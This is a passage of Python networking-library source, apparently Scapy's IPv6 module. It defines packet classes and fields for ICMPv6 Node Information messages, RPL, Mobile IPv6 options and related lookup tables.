    for name in x:
        # single-component names get one more null byte
        terminator = b"\x00\x00" if name.count(b'.') == 0 else b"\x00"
        labels = b"".join(chb(len(label)) + label
                          for label in name.split(b'.'))
        encoded.append(labels + terminator)
    return b"".join(encoded)

2427 

2428 

def dnsrepr2names(x):
    """
    Decode length-prefixed DNS labels into a list of names (bytes).

    A name is emitted each time a null length byte is met; a second null
    byte right after it (single-component form) is skipped. An exception
    is raised when a length byte has one of its two top bits set, since
    compression is not supported. Result is a list.
    """
    names = []
    current = b""
    while x:
        length = orb(x[0])
        x = x[1:]
        if not length:
            # End of a name: drop the dot added after its last label
            names.append(current[:-1] if current.endswith(b'.') else current)
            current = b""
            if x and orb(x[0]) == 0:  # single component
                x = x[1:]
        elif length & 0xc0:  # XXX TODO : work on that -- arno
            raise Exception("DNS message can't be compressed at this point!")
        else:
            current += x[:length] + b"."
            x = x[length:]
    return names

2455 

2456 

class NIQueryDataField(StrField):
    """Data field of Node Information queries.

    The internal value is a ``(type, value)`` pair where type is 0 for an
    IPv6 address, 1 for a DNS-encoded name and 2 for an IPv4 address.
    """

    def __init__(self, name, default):
        StrField.__init__(self, name, default)

    def i2h(self, pkt, x):
        """Return the value part of the pair; names are decoded first."""
        if x is None:
            return x
        t, val = x
        if t == 1:
            # Empty name data decodes to no name at all: return b"" instead
            # of failing with an IndexError
            names = dnsrepr2names(val)
            val = names[0] if names else b""
        return val

    def h2i(self, pkt, x):
        """Guess the kind of ``x`` and return the ``(type, value)`` pair.

        A tuple whose first element is an int is taken as already internal.
        Otherwise ``x`` is tried as an IPv6 address, then as an IPv4
        address, and finally handled as a DNS name.
        """
        # isinstance() is required here: "x is tuple" compares x with the
        # tuple type itself and is never true for a tuple value
        if isinstance(x, tuple) and x and isinstance(x[0], int):
            return x

        # Try IPv6
        try:
            inet_pton(socket.AF_INET6, x.decode())
            return (0, x.decode())
        except Exception:
            # Best effort: not an IPv6 address, try the next form
            pass
        # Try IPv4
        try:
            inet_pton(socket.AF_INET, x.decode())
            return (2, x.decode())
        except Exception:
            # Best effort: not an IPv4 address, fall back to a DNS name
            pass
        # Try DNS
        if x is None:
            x = b""
        x = names2dnsrepr(x)
        return (1, x)

    def i2repr(self, pkt, x):
        """Return a printable form of the internal value."""
        t, val = x
        if t == 1:  # DNS Name
            # we don't use dnsrepr2names() to deal with
            # possible weird data extracted info
            res = []
            while val:
                tmp_len = orb(val[0])
                val = val[1:]
                if tmp_len == 0:
                    break
                res.append(plain_str(val[:tmp_len]) + ".")
                val = val[tmp_len:]
            tmp = "".join(res)
            if tmp and tmp[-1] == '.':
                tmp = tmp[:-1]
            return tmp
        return repr(val)

    def getfield(self, pkt, s):
        """Dissect the data according to the packet's qtype and code."""
        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")
        else:
            code = getattr(pkt, "code")
            if code == 0:  # IPv6 Addr
                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
            elif code == 2:  # IPv4 Addr
                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
            else:  # Name or Unknown
                return b"", (1, s)

    def addfield(self, pkt, s, val):
        """Append the wire form of ``val`` to ``s``."""
        # A missing value is built as an empty name
        if ((isinstance(val, tuple) and val[1] is None) or
                val is None):
            val = (1, b"")
        t = val[0]
        if t == 1:
            return s + val[1]
        elif t == 0:
            return s + inet_pton(socket.AF_INET6, val[1])
        else:
            return s + inet_pton(socket.AF_INET, val[1])

2534 

2535 

class NIQueryCodeField(ByteEnumField):
    """Code field whose value, when unset, follows the packet's data type."""

    def i2m(self, pkt, x):
        """Return ``x``, or a code derived from the "data" field if ``x`` is None.

        Data of type 0 (IPv6 address) gives code 0, type 2 (IPv4 address)
        gives code 2; names, unknown types and missing data give code 1.
        """
        if x is not None:
            return x
        d = pkt.getfieldval("data")
        if d is None:
            return 1
        kind = d[0]
        if kind == 0:  # IPv6 address
            return 0
        if kind == 2:  # IPv4 address
            return 2
        return 1  # Name, or anything else

2551 

2552 

# Display names for the ICMP code of Node Information queries
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}

2554 

2555# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", 

2556# 8: "Link-local addresses", 16: "Site-local addresses", 

2557# 32: "Global addresses" } 

2558 

2559# "This NI type has no defined flags and never has a Data Field". Used 

2560# to know if the destination is up and implements NI protocol. 

2561 

2562 

# ICMPv6 Node Information Query (type 139) with qtype 0 (NOOP). The other
# query classes derive from it and only override class-level values.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [ByteEnumField("type", 139, icmp6types),
                   # When left to None, the code is derived from "data"
                   NIQueryCodeField("code", None, _niquery_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   # unused and flags together span 16 bits (10 + 6)
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIQueryDataField("data", None)]

2573 

2574 

# Node Information query with the class-level qtype set to 2 ("Node Name")
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    name = "ICMPv6 Node Information Query - IPv6 Name Query"
    qtype = 2

2578 

2579# We ask for the IPv6 address of the peer 

2580 

2581 

# Node Information query with the class-level qtype set to 3
# ("IPv6 Address") and flags set to 0x3E
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    name = "ICMPv6 Node Information Query - IPv6 Address Query"
    qtype = 3
    flags = 0x3E

2586 

2587 

# Node Information query with the class-level qtype set to 4
# ("IPv4 Address")
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    name = "ICMPv6 Node Information Query - IPv4 Address Query"
    qtype = 4

2591 

2592 

2593_nireply_code = {0: "Successful Reply", 

2594 1: "Response Refusal", 

2595 3: "Unknown query type"} 

2596 

# Descriptions of Node Information reply flags, keyed by bit value
_nireply_flags = {1: "Reply set incomplete",
                  2: "All unicast addresses",
                  4: "IPv4 addresses",
                  8: "Link-local addresses",
                  16: "Site-local addresses",
                  32: "Global addresses"}

2603 

2604# Internal repr is one of those : 

2605# (0, "some string") : unknown qtype value are mapped to that one 

2606# (3, [ (ttl, ip6), ... ]) 

2607# (4, [ (ttl, ip4), ... ]) 

2608# (2, [ttl, dns_names]) : dns_names is one string that contains 

2609# all the DNS names. Internally it is kept ready to be sent 

2610# (undissected). i2repr() decode it for user. This is to 

2611# make build after dissection bijective. 

2612# 

2613# I also merged getfield() and m2i(), and addfield() and i2m(). 

2614 

2615 

class NIReplyDataField(StrField):
    """Data field of Node Information replies.

    Internal values are ``(qtype, value)`` pairs: ``(2, [ttl, dnsnames])``
    for names (kept DNS-encoded), ``(3, [(ttl, ip6), ...])`` and
    ``(4, [(ttl, ip4), ...])`` for addresses, ``(0, data)`` otherwise.
    """

    def i2h(self, pkt, x):
        """Return the value part of the pair; names are decoded first."""
        if x is None:
            return x
        kind, payload = x
        if kind != 2:
            return payload
        ttl, dnsnames = payload
        return [ttl] + dnsrepr2names(dnsnames)

    def h2i(self, pkt, x):
        """Normalize a user-provided value into a ``(qtype, value)`` pair.

        When ``x`` is a tuple its first element is the qtype; otherwise the
        qtype is read from ``pkt`` (0 if there is no packet).
        """
        if isinstance(x, tuple):
            qtype, x = x[0], x[1]
        elif pkt is not None:
            qtype = pkt.qtype
        else:
            qtype = 0  # decoded as a plain string

        # From that point on, x is the value (second element of the tuple)

        if qtype == 2:  # DNS name
            if isinstance(x, (str, bytes)):  # listify the string
                x = [x]
            if isinstance(x, list):
                x = [item.encode() if isinstance(item, str) else item
                     for item in x]
            # An int in first position is the TTL, otherwise TTL is 0
            if x and isinstance(x[0], int):
                ttl, names = x[0], x[1:]
            else:
                ttl, names = 0, x
            return (2, [ttl, names2dnsrepr(names)])

        if qtype in (3, 4):  # IPv4 or IPv6 addr
            # User may directly provide an IP, instead of a list
            entries = x if isinstance(x, list) else [x]

            def fixvalue(entry):
                # Elements that are not tuples have no ttl: use 0 instead
                if not isinstance(entry, tuple):
                    entry = (0, entry)
                # Decode bytes
                if isinstance(entry[1], bytes):
                    entry = (entry[0], entry[1].decode())
                return entry

            return (qtype, [fixvalue(entry) for entry in entries])

        return (qtype, x)

    def addfield(self, pkt, s, val):
        """Append the wire form of the ``(qtype, value)`` pair to ``s``."""
        kind, payload = val
        if payload is None:
            payload = b""
        if kind == 2:
            ttl, dnsstr = payload
            return s + struct.pack("!I", ttl) + dnsstr
        if kind == 3 or kind == 4:
            # Each entry is a 32-bit TTL followed by the packed address
            family = socket.AF_INET6 if kind == 3 else socket.AF_INET
            return s + b"".join(
                struct.pack("!I", entry[0]) + inet_pton(family, entry[1])
                for entry in payload
            )
        return s + payload

    def getfield(self, pkt, s):
        """Dissect the data according to the packet's code and qtype."""
        if getattr(pkt, "code") != 0:
            return s, (0, b"")

        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")

        if qtype == 2:
            if len(s) < 4:
                return s, (0, b"")
            ttl = struct.unpack("!I", s[:4])[0]
            return b"", (2, [ttl, s[4:]])

        if qtype == 3 or qtype == 4:  # addresses with TTLs
            # XXX TODO : get the real length
            if qtype == 3:
                tag, family, record_len = 3, socket.AF_INET6, 20  # 4 + 16
            else:
                tag, family, record_len = 4, socket.AF_INET, 8  # 4 + 4
            records = []
            while len(s) >= record_len:
                ttl = struct.unpack("!I", s[:4])[0]
                records.append((ttl, inet_ntop(family, s[4:record_len])))
                s = s[record_len:]
            return s, (tag, records)

        # XXX TODO : implement me and deal with real length
        return b"", (0, s)

    def i2repr(self, pkt, x):
        """Return a printable form of the internal value."""
        if x is None:
            return "[]"

        if not (isinstance(x, tuple) and len(x) == 2):
            return repr(x)  # XXX should not happen

        kind, payload = x
        if kind == 2:  # DNS names
            ttl, dnsnames = payload
            decoded = [plain_str(entry) for entry in dnsrepr2names(dnsnames)]
            return "ttl:%d %s" % (ttl, ",".join(decoded))
        if kind == 3 or kind == 4:
            pairs = ["(%d, %s)" % (entry[0], entry[1]) for entry in payload]
            return "[ %s ]" % (", ".join(pairs))
        return repr(payload)

2739 

2740# By default, sent responses have code set to 0 (successful) 

2741 

2742 

# ICMPv6 Node Information Reply (type 140) with qtype 0 (NOOP). The other
# reply classes derive from it and only override class-level values.
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
    name = "ICMPv6 Node Information Reply - NOOP Reply"
    fields_desc = [ByteEnumField("type", 140, icmp6types),
                   ByteEnumField("code", 0, _nireply_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   # unused and flags together span 16 bits (10 + 6)
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIReplyDataField("data", None)]

2753 

2754 

# Node Information reply with the class-level qtype set to 2 ("Node Name")
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - Node Names"
    qtype = 2

2758 

2759 

# Node Information reply with the class-level qtype set to 3
# ("IPv6 Address")
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - IPv6 addresses"
    qtype = 3

2763 

2764 

# Node Information reply with the class-level qtype set to 4
# ("IPv4 Address")
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - IPv4 addresses"
    qtype = 4

2768 

2769 

# Node Information reply with the class-level code set to 1
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
    code = 1

2773 

2774 

# Node Information reply with the class-level code set to 2
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
    code = 2

2778 

2779 

def _niquery_guesser(p):
    """Pick the Node Information class matching the raw ICMPv6 bytes ``p``.

    Queries (type 139) are selected by qtype; replies (type 140) by code
    and, for code 0, by qtype. ``conf.raw_layer`` is returned when nothing
    matches or when the data is too short to hold a qtype.
    """
    msg_type = orb(p[0])

    if msg_type == 139:  # Node Info Query specific stuff
        if len(p) <= 6:
            return conf.raw_layer
        qtype, = struct.unpack("!H", p[4:6])
        queries = {0: ICMPv6NIQueryNOOP,
                   2: ICMPv6NIQueryName,
                   3: ICMPv6NIQueryIPv6,
                   4: ICMPv6NIQueryIPv4}
        return queries.get(qtype, conf.raw_layer)

    if msg_type == 140:  # Node Info Reply specific stuff
        code = orb(p[1])
        if code == 1:
            return ICMPv6NIReplyRefuse
        if code == 2:
            return ICMPv6NIReplyUnknown
        if code == 0 and len(p) > 6:
            qtype, = struct.unpack("!H", p[4:6])
            replies = {2: ICMPv6NIReplyName,
                       3: ICMPv6NIReplyIPv6,
                       4: ICMPv6NIReplyIPv4}
            return replies.get(qtype, ICMPv6NIReplyNOOP)

    return conf.raw_layer

2803 

2804 

2805############################################################################# 

2806############################################################################# 

2807# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # 

2808############################################################################# 

2809############################################################################# 

2810 

# RPL control message codes, see
# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
# Codes 4, 5 and 6 are listed for reference only and are not mapped.
rplcodes = {
    0: "DIS",
    1: "DIO",
    2: "DAO",
    3: "DAO-ACK",
    # 4: "P2P-DRO",
    # 5: "P2P-DRO-ACK",
    # 6: "Measurement",
    7: "DCO",
    8: "DCO-ACK",
}

2821 

2822 

class ICMPv6RPL(_ICMPv6):  # RFC 6550
    """ICMPv6 header for RPL control messages (default type 155)."""

    name = 'RPL'
    fields_desc = [
        ByteEnumField("type", 155, icmp6types),
        ByteEnumField("code", 0, rplcodes),
        XShortField("cksum", None),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}

2829 

2830 

2831############################################################################# 

2832############################################################################# 

2833# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # 

2834############################################################################# 

2835############################################################################# 

2836 

2837# Mobile IPv6 ICMPv6 related classes 

2838 

class ICMPv6HAADRequest(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Request (default type 144)."""

    name = 'ICMPv6 Home Agent Address Discovery Request'
    fields_desc = [ByteEnumField("type", 144, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15)]

    def hashret(self):
        """
        Return the packed 16-bit id followed by the payload hashret.

        The id field defaults to None, which struct.pack() cannot encode;
        an unset id is therefore hashed as 0 instead of raising.
        NOTE(review): 0 is presumably also the value put on the wire for
        an unset id - confirm against the field implementation.
        """
        ident = 0 if self.id is None else self.id
        return struct.pack("!H", ident) + self.payload.hashret()

2850 

2851 

class ICMPv6HAADReply(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Reply (default type 145)."""

    name = 'ICMPv6 Home Agent Address Discovery Reply'
    fields_desc = [ByteEnumField("type", 145, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15),
                   IP6ListField('addresses', None)]

    def hashret(self):
        """
        Return the packed 16-bit id followed by the payload hashret.

        The id field defaults to None, which struct.pack() cannot encode;
        an unset id is therefore hashed as 0 instead of raising.
        """
        ident = 0 if self.id is None else self.id
        return struct.pack("!H", ident) + self.payload.hashret()

    def answers(self, other):
        """
        Tell whether this reply answers other: other must be an
        ICMPv6HAADRequest carrying the same id.
        """
        if not isinstance(other, ICMPv6HAADRequest):
            return 0
        return self.id == other.id

2869 

2870 

class ICMPv6MPSol(_ICMPv6):
    """ICMPv6 Mobile Prefix Solicitation (default type 146)."""

    name = 'ICMPv6 Mobile Prefix Solicitation'
    fields_desc = [ByteEnumField("type", 146, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   XShortField("res", 0)]

    def hashret(self):
        """
        Return the packed 16-bit id.

        This method used to be spelled _hashret only, so it did not
        override hashret() and the solicitation did not hash like
        ICMPv6MPAdv, which returns the packed id. The id field defaults
        to None, which struct.pack() cannot encode; an unset id is
        hashed as 0.
        """
        ident = 0 if self.id is None else self.id
        return struct.pack("!H", ident)

    # Former (misspelled) name, kept for backward compatibility
    _hashret = hashret

2881 

2882 

class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Mobile Prefix Advertisement (default type 147)."""

    name = 'ICMPv6 Mobile Prefix Advertisement'
    fields_desc = [ByteEnumField("type", 147, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
                   XBitField("res", 0, 14)]

    def hashret(self):
        """
        Return the packed 16-bit id.

        The id field defaults to None, which struct.pack() cannot encode;
        an unset id is therefore hashed as 0 instead of raising.
        """
        ident = 0 if self.id is None else self.id
        return struct.pack("!H", ident)

    def answers(self, other):
        """Any ICMPv6MPSol is accepted as the stimulus of this packet."""
        return isinstance(other, ICMPv6MPSol)

2897 

2898# Mobile IPv6 Options classes 

2899 

2900 

# Mobility option type -> printable name (used by the 'otype' enum fields)
_mobopttypes = {
    2: "Binding Refresh Advice",
    3: "Alternate Care-of Address",
    4: "Nonce Indices",
    5: "Binding Authorization Data",
    6: "Mobile Network Prefix (RFC3963)",
    7: "Link-Layer Address (RFC4068)",
    8: "Mobile Node Identifier (RFC4283)",
    9: "Mobility Message Authentication (RFC4285)",
    10: "Replay Protection (RFC4285)",
    11: "CGA Parameters Request (RFC4866)",
    12: "CGA Parameters (RFC4866)",
    13: "Signature (RFC4866)",
    14: "Home Keygen Token (RFC4866)",
    15: "Care-of Test Init (RFC4866)",
    16: "Care-of Test (RFC4866)",
}

2916 

2917 

class _MIP6OptAlign(Packet):
    """
    Base class of the Mobile IPv6 options.

    Those options have alignment requirements of the form x*n+y. Each
    subclass only has to provide x and y as class parameters; this class
    then computes how much padding (Pad1 or PadN) is needed in front of
    the option. x=0 and y=0 mean that no alignment is required.
    """

    __slots__ = ["x", "y"]

    def alignment_delta(self, curpos):
        """
        Return the number of bytes separating curpos from the next
        position of the form x*n+y (0 when x and y are both 0).
        """
        x = self.x
        y = self.y
        if x != 0 or y != 0:
            # Round (curpos - y) up to a multiple of x
            blocks = (curpos - y + x - 1) // x
            return x * blocks + y - curpos
        return 0

    def extract_padding(self, p):
        """Keep nothing as payload: all of p is returned as padding."""
        return b"", p

2937 

2938 

class MIP6OptBRAdvice(_MIP6OptAlign):
    """Mobility option of type 2 carrying a 16-bit 'rinter' value."""

    name = 'Mobile IPv6 Option - Binding Refresh Advice'
    fields_desc = [
        ByteEnumField('otype', 2, _mobopttypes),
        ByteField('olen', 2),
        ShortField('rinter', 0),
    ]
    # alignment requirement: 2n
    x = 2
    y = 0

2946 

2947 

class MIP6OptAltCoA(_MIP6OptAlign):
    """Mobility option of type 3 carrying one IPv6 address ('acoa')."""

    name = 'MIPv6 Option - Alternate Care-of Address'
    fields_desc = [
        ByteEnumField('otype', 3, _mobopttypes),
        ByteField('olen', 16),
        IP6Field("acoa", "::"),
    ]
    # alignment requirement: 8n+6
    x = 8
    y = 6

2955 

2956 

class MIP6OptNonceIndices(_MIP6OptAlign):
    """
    Mobility option of type 4 carrying the home ('hni') and care-of
    ('coni') nonce indices, two 16-bit values.
    """

    name = 'MIPv6 Option - Nonce Indices'
    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
                   # The option data is two 16-bit indices, i.e. 4 bytes.
                   # The default used to be 16, which does not match the
                   # data actually built after the length byte.
                   ByteField('olen', 4),
                   ShortField('hni', 0),
                   ShortField('coni', 0)]
    x = 2
    y = 0  # alignment requirement: 2n

2965 

2966 

class MIP6OptBindingAuthData(_MIP6OptAlign):
    """Mobility option of type 5 carrying a 96-bit 'authenticator'."""

    name = 'MIPv6 Option - Binding Authorization Data'
    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
                   # The authenticator is 96 bits long, i.e. 12 bytes.
                   # The default used to be 16, which does not match the
                   # data actually built after the length byte.
                   ByteField('olen', 12),
                   BitField('authenticator', 0, 96)]
    x = 8
    y = 2  # alignment requirement: 8n+2

2974 

2975 

class MIP6OptMobNetPrefix(_MIP6OptAlign):  # NEMO - RFC 3963
    """Mobility option of type 6: prefix length plus IPv6 prefix."""

    name = 'NEMO Option - Mobile Network Prefix'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        ByteField("olen", 18),
        ByteField("reserved", 0),
        ByteField("plen", 64),
        IP6Field("prefix", "::"),
    ]
    # alignment requirement: 8n+4
    x = 8
    y = 4

2985 

2986 

class MIP6OptLLAddr(_MIP6OptAlign):  # Sect 6.4.4 of RFC 4068
    """Mobility option of type 7 carrying a MAC address ('lla')."""

    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
    fields_desc = [
        ByteEnumField("otype", 7, _mobopttypes),
        ByteField("olen", 7),
        ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
        ByteField("pad", 0),
        MACField("lla", ETHER_ANY),  # Only support ethernet
    ]
    # alignment requirement: none
    x = 0
    y = 0

2996 

2997 

class MIP6OptMNID(_MIP6OptAlign):  # RFC 4283
    """
    Mobility option of type 8. 'olen' is computed as len(id) + 1, the
    extra byte accounting for the 'subtype' field.
    """

    name = "MIPv6 Option - Mobile Node Identifier"
    fields_desc = [
        ByteEnumField("otype", 8, _mobopttypes),
        FieldLenField("olen", None, length_of="id", fmt="B",
                      adjust=lambda pkt, x: x + 1),
        ByteEnumField("subtype", 1, {1: "NAI"}),
        StrLenField("id", "",
                    length_from=lambda pkt: pkt.olen - 1),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3008 

3009# We only support decoding and basic build. Automatic HMAC computation is 

3010# too much work for our current needs. It is left to the user (I mean ... 

3011# you). --arno 

3012 

3013 

class MIP6OptMsgAuth(_MIP6OptAlign):  # RFC 4285 (Sect. 5)
    """
    Mobility option of type 9. 'olen' is computed as len(authdata) + 5,
    the extra bytes accounting for the 'subtype' and 'mspi' fields.
    """

    name = "MIPv6 Option - Mobility Message Authentication"
    fields_desc = [
        ByteEnumField("otype", 9, _mobopttypes),
        FieldLenField("olen", None, length_of="authdata", fmt="B",
                      adjust=lambda pkt, x: x + 5),
        ByteEnumField("subtype", 1,
                      {1: "MN-HA authentication mobility option",
                       2: "MN-AAA authentication mobility option"}),
        IntField("mspi", None),
        StrLenField("authdata", "A" * 12,
                    length_from=lambda pkt: pkt.olen - 5),
    ]
    # alignment requirement: 4n+1
    x = 4
    y = 1

3026 

3027# Extracted from RFC 1305 (NTP) : 

3028# NTP timestamps are represented as a 64-bit unsigned fixed-point number, 

3029# in seconds relative to 0h on 1 January 1900. The integer part is in the 

3030# first 32 bits and the fraction part in the last 32 bits. 

3031 

3032 

class NTPTimestampField(LongField):
    """
    64-bit NTP timestamp: seconds since 0h on 1 January 1900, integer
    part in the upper 32 bits and fraction in the lower 32 bits.
    """

    def i2repr(self, pkt, x):
        """
        Return x as a human readable UTC date followed by the raw value.

        Values below 50 * 31536000 seconds (about 50 years after the NTP
        epoch) are not converted and get a generic message instead.
        """
        if x < ((50 * 31536000) << 32):
            return "Some date a few decades ago (%d)" % x

        # Seconds between the NTP epoch (1900-01-01 00:00:00 UTC) and the
        # Unix epoch (1970-01-01 00:00:00 UTC): 70 years including 17 leap
        # days, i.e. (70 * 365 + 17) * 86400. The value previously used
        # here (2209075761) was off by about a day.
        delta = -2208988800
        i = int(x >> 32)
        j = float(x & 0xffffffff) * 2.0**-32
        res = i + j + delta
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))

        return "%s (%d)" % (t, x)

3047 

3048 

class MIP6OptReplayProtection(_MIP6OptAlign):  # RFC 4285 (Sect. 6)
    """Mobility option of type 10 carrying a 64-bit NTP timestamp."""

    name = "MIPv6 option - Replay Protection"
    fields_desc = [
        ByteEnumField("otype", 10, _mobopttypes),
        ByteField("olen", 8),
        NTPTimestampField("timestamp", 0),
    ]
    # alignment requirement: 8n+2
    x = 8
    y = 2

3056 

3057 

class MIP6OptCGAParamsReq(_MIP6OptAlign):  # RFC 4866 (Sect. 5.6)
    """Mobility option of type 11; it has no data ('olen' is 0)."""

    name = "MIPv6 option - CGA Parameters Request"
    fields_desc = [
        ByteEnumField("otype", 11, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3064 

3065# XXX TODO: deal with CGA param fragmentation and build of defragmented 

3066# XXX version. Passing of a big CGAParam structure should be 

3067# XXX simplified. Make it hold packets, by the way --arno 

3068 

3069 

class MIP6OptCGAParams(_MIP6OptAlign):  # RFC 4866 (Sect. 5.1)
    """Mobility option of type 12; 'olen' is the length of 'cgaparams'."""

    name = "MIPv6 option - CGA Parameters"
    fields_desc = [
        ByteEnumField("otype", 12, _mobopttypes),
        FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
        StrLenField("cgaparams", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3078 

3079 

class MIP6OptSignature(_MIP6OptAlign):  # RFC 4866 (Sect. 5.2)
    """Mobility option of type 13; 'olen' is the length of 'sig'."""

    name = "MIPv6 option - Signature"
    fields_desc = [
        ByteEnumField("otype", 13, _mobopttypes),
        FieldLenField("olen", None, length_of="sig", fmt="B"),
        StrLenField("sig", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3088 

3089 

class MIP6OptHomeKeygenToken(_MIP6OptAlign):  # RFC 4866 (Sect. 5.3)
    """Mobility option of type 14; 'olen' is the length of 'hkt'."""

    name = "MIPv6 option - Home Keygen Token"
    fields_desc = [
        ByteEnumField("otype", 14, _mobopttypes),
        FieldLenField("olen", None, length_of="hkt", fmt="B"),
        StrLenField("hkt", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3098 

3099 

class MIP6OptCareOfTestInit(_MIP6OptAlign):  # RFC 4866 (Sect. 5.4)
    """Mobility option of type 15; it has no data ('olen' is 0)."""

    name = "MIPv6 option - Care-of Test Init"
    fields_desc = [
        ByteEnumField("otype", 15, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3106 

3107 

class MIP6OptCareOfTest(_MIP6OptAlign):  # RFC 4866 (Sect. 5.5)
    """Mobility option of type 16; 'olen' is the length of 'cokt'."""

    name = "MIPv6 option - Care-of Test"
    fields_desc = [
        ByteEnumField("otype", 16, _mobopttypes),
        FieldLenField("olen", None, length_of="cokt", fmt="B"),
        StrLenField("cokt", b'\x00' * 8,
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3116 

3117 

class MIP6OptUnknown(_MIP6OptAlign):
    """
    Generic type/length/data mobility option. Its dispatch hook selects
    the class registered in moboptcls for the option type found in the
    first byte of the data, and falls back on this class otherwise.
    """

    name = 'Scapy6 - Unknown Mobility Option'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        FieldLenField("olen", None, length_of="odata", fmt="B"),
        StrLenField("odata", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return the class to use for the raw option _pkt."""
        if not _pkt:
            return cls
        opt_type = orb(_pkt[0])  # Option type
        return moboptcls.get(opt_type, cls)

3134 

3135 

# Mobility option type -> class used to handle it
# (see MIP6OptUnknown.dispatch_hook)
moboptcls = {
    0: Pad1,
    1: PadN,
    2: MIP6OptBRAdvice,
    3: MIP6OptAltCoA,
    4: MIP6OptNonceIndices,
    5: MIP6OptBindingAuthData,
    6: MIP6OptMobNetPrefix,
    7: MIP6OptLLAddr,
    8: MIP6OptMNID,
    9: MIP6OptMsgAuth,
    10: MIP6OptReplayProtection,
    11: MIP6OptCGAParamsReq,
    12: MIP6OptCGAParams,
    13: MIP6OptSignature,
    14: MIP6OptHomeKeygenToken,
    15: MIP6OptCareOfTestInit,
    16: MIP6OptCareOfTest,
}

3153 

3154 

3155# Main Mobile IPv6 Classes 

3156 

# Mobility Header type -> short name (used by the 'mhtype' enum fields)
mhtypes = {
    0: 'BRR',
    1: 'HoTI',
    2: 'CoTI',
    3: 'HoT',
    4: 'CoT',
    5: 'BU',
    6: 'BA',
    7: 'BE',
    8: 'Fast BU',
    9: 'Fast BA',
    10: 'Fast NA',
}

3168 

# Binding Acknowledgement status codes, taken from
# http://www.iana.org/assignments/mobility-parameters
bastatus = {
    0: 'Binding Update accepted',
    1: 'Accepted but prefix discovery necessary',
    128: 'Reason unspecified',
    129: 'Administratively prohibited',
    130: 'Insufficient resources',
    131: 'Home registration not supported',
    132: 'Not home subnet',
    133: 'Not home agent for this mobile node',
    134: 'Duplicate Address Detection failed',
    135: 'Sequence number out of window',
    136: 'Expired home nonce index',
    137: 'Expired care-of nonce index',
    138: 'Expired nonces',
    139: 'Registration type change disallowed',
    140: 'Mobile Router Operation not permitted',
    141: 'Invalid Prefix',
    142: 'Not Authorized for Prefix',
    143: 'Forwarding Setup failed (prefixes missing)',
    144: 'MIPV6-ID-MISMATCH',
    145: 'MIPV6-MESG-ID-REQD',
    146: 'MIPV6-AUTH-FAIL',
    147: 'Permanent home keygen token unavailable',
    148: 'CGA and signature verification failed',
    149: 'Permanent home keygen token exists',
    150: 'Non-null home nonce index expected',
}

